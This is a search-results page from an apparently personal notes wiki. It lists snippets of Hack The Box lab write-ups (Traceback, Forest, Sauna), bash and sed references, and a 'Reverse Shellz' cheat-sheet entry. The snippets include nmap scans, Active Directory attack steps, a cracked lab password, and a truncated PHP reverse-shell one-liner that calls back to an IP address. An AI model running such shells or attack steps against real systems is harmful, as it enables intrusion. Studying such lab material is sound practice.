Advanced Search
Search Results
77 total results found
Hack The Box
Active && Retired Writeups
Exploring the System as User
To get root, we will need a proper user shell. Taking the lua exploit we used to print the user f...
Root Flag
Methods for privilege escalation to root
User Flag
Root Flag
Enumeration methods for obtaining root access.
Deployment
Steps to getting Django project prepared for production environment. Using `nginx` as webserve...
Initial Enumeration
Starting off with a typical htb nmap scan: nmap -AT4 -Pn -p- -v -oN Traceback 10.10.10.181 We...
Web Shell Exploitation
Heading over to 10.10.10.181/smevk.php we can see its prompting us for login. Checking the smevk....
Initial Enumeration
Starting off with a typical super intrusive nmap scan,nmap -T5 -APn -o Forest -p- 10.10.10.161 W...
Enum4Linux
What is Enum4Linux? A Linux alternative to enum.exe for enumerating data from Windows and Samba ...
Impacket - Get Users from Active Directory
So far we have received enough information to start forming an attack.We will try to perform kerb...
Cracking password and owning user
With success, we get a password s3rvice for user svc-alfresco Since we also saw earlier, ...
Exploiting Poor Configuration
Exploiting this will be pretty straight forward. Knowing we have a short window (30 seconds) to ...
Signals
Handling Signals Signaling the bash shell
John the Ripper
Initial Enumeration
File Comparisons
File Comparisons -d Checks if file exists and is a directory if [ -d $file ]thendo_somethi...
String Comparisons
String Comparisons str1 = str2 Checks if str1 is the same as str2 if [ $str1 = $str2 ]the...
Numeric Comparisons
Numeric Comparisons The most common test evaluation methods perform a comparison of two numerica...
Advanced Comparisons
Double Parentheses The double parentheses command allows you to incorporate advanced mathematica...
Double Brackets [[
Pattern Matching The double bracket command provides advanced features for string comparisons, p...
Reverse Shellz
PHP Reverse Shell php -r '$sock=fsockopen("192.168.1.7",80);exec("/bin/sh -i <&3 >...
Cheat Sheet
Linux Signals Cheat Sheet Most Used Linux Signals Signal Value Description 1 SIGHUP Ha...
SED Quick Reference Guide
Introduction Format sed options script file The options parameters allow you have more co...
New Page
Special Character Classes Class Description [[:alpha:]] Matching any alphabetical charact...
User Flag
The methods of getting to user
Comparisons
Numerical, String, and File Comparisons reference page.
Resources
Forensics
Notes
Traceback
Creators: xh4h OS : Linux Difficulty: Easy Points: 20 Release: 14 Mar 2020 IP: 10.10.10.181
Forest
Creators: egre55 & mrb3n OS: Windows Difficulty: Easy Points: 20 Release: 12 Oct 2019 IP: ...
Sauna
RETIRED A Windows server that was heavily focused on website & Active Directory enumeration. Hac...
OpenAdmin
Traverxec
Nest
Monteverde
Mango
Password Cracking
Wireless Exploitation
Bash
Resources for all things BaSH related ^_^ * Cheat Sheets * References * Docs
User Flag
Reverse Shellz
All the common reverse shells you could possibly think of
Sed Editor
StreamlineEDitor quick reference guide :)
Regular Expression
An overview and quick reference guide to regular expressions with POSIX
SneakyMailer
Creators: sulcud OS : Linux Difficulty: Medium Points: 30 Release: 11 Jul 2020 IP: 10.10.10.197
Jet Fortress
The company that has an active fortress. 11 flags The Environment Our infrastructure is ...
Jet Fortress
This company has an active fortress. 11 flags. The Environment Our infrastructure is larg...
nmap
Beep
User Flag
how to get user flag
User Flag
Root Flag
Escalation to Root
Initial Enumeration
Starting off with a typical htb nmap scan: nmap -AT4 -Pn -p- -v -oN Sauna 10.10.10.175 We can...